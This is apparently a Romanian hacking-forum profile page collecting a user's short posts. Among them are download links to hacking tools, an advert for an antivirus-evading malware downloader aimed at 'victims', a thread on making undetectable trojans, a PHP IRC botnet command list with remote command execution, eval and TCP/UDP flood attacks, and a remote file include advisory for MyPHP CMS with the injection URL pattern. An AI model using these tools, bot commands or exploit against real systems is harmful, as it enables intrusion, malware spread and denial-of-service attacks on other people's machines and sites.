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Everything posted by ghici
Creezi executabil cu care spargi iduri de mess
ghici replied to Aft3rDark's topic in Programe hacking
invatati hex si in 5 minute faceti orice undetectabil -
RedJoker asta ii 2.0 care l-au pus
da mere de minune
da .. oricum mere numa pe versiuni "nulled"
si ce hackeresti cu el? careva sa-l mute la stuff tools
super .. ms..adaugat la colectie
mere l-am testat ! am pus pagina pe ropage.com
Nohacker Scan http://www.xiaod.org/toolss/nhs.rar
this is a program ALL ASP , ALL PHP , ALL MDB , ALL RF? , Webclicker , Whois , IP Search Remote File ?nclude tools database text =) http://rapidshare.de/files/23205407/bekirtool.rar.html
Hello ppl in my Downloader ... it's cool and deffernet from any downloader you ever seen .. it has many things like : 1- undetectable by all AV. 2- Fast downloading in victoms PC. 3- E-Mail Nofiti. 4- The Best thing (only in this program) you can run a fake program in it. 5- 3 Languages ( Arabic , English , Frech) . Here is Pic : Download Liknk http://tm-world.net/AAPrograms/Arabian-Att...nloader-1.0.rar cya in other program
<div class='quotetop'>QUOTE("THE_MAN")</div>
Nemessis te iubesc! frumos share .... parca vad cand vine kw3rln ca-ti da VIP
vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection
ghici replied to Bigojey's topic in Exploituri
ce inseamna nos la tine vechi? -
vBulletin 3.5.4 exploit [Daca patch-ul install este deschis.
ghici replied to Screech's topic in Tutoriale in romana
foarte frumos .. mersi mult! -
DiaboliC iti trebe macar unu din o retea sa aiba ip real si merge linistit
oricand te ajut zion mio zis kw3rln sa am grija de tine
gif.hta.gif malware spread - creere troieni nedetectabili
ghici replied to a topic in Tutoriale video
fucking nice Nemessis ! BRAVO ! .. -
tu orb la tine? .user <password> //login to the bot .logout //logout of the bot .die //kill the bot .restart //restart the bot .mail <to> <from> <subject> <msg> //send an email .dns <IP|HOST> //dns lookup .download <URL> <filename> //download a file .exec <cmd> // uses shell_exec() //execute a command .cmd <cmd> // uses popen() //execute a command .info //get system information .php <php code> // uses eval() //execute php code .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack .udpflood <target> <packets> <packetsize> <delay> //udpflood attack .raw <cmd> //raw IRC command .rndnick //change nickname .pscan <host> <port> //port scan .ud.server <newhost> <newport> [newpass] //change IRC server
care multe dintre ele? in afara de netcontrol la ceilalti nu trebe ip real
nu creca mere pe freehostinguri..incearca
info nu ne dai despre el? dak iti dau niste caractere ce stii sa faci?
nice share! mersi
lasati-l pe blueye ca nu stie nici proxy sa foloseasca....
mo pus kw3rln sa pun vurnerabilitatea asta publica ca si asa nu sunt siteuri http://www.xss-watch.org/teamwork/exploits...myphp%20cms.txt o sa fie publica pe milw0rm curand --------------------------------------------------------------------------- MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net : Remote : Yes Critical Level : Dangerous --------------------------------------------------------------------------- Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : MyPHP CMS version : latest version [ 0.3 ] URL : http://sourceforge.net/projects/myphpcms ------------------------------------------------------------------ Exploit: ~~~~~~~~ Variable $domain not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script. # /styles/default/global_header.php?domain=[Evil_Script]]http://www.site.com/[path]/styles/default/...n=[Evil_Script] --------------------------------------------------------------------------- Solution : ~~~~~~~~~~ declare variabel $domain --------------------------------------------------------------------------- Shoutz: ~~~~~~ # Special greetz to my good friend [Oo] # To all members of h4cky0u.org and RST [ hTTp://RoSecurityGroup.net ] --------------------------------------------------------------------------- */ Contact: ~~~~~~~~ Nick: Kw3rLn E-mail: ciriboflacs[at]YaHoo[dot]Com Homepage: hTTp://RoSecurityGroup.net /* -------------------------------- [ EOF] ----------------------------------
mah ungur la tine? citeste regulile + sectiune gresita !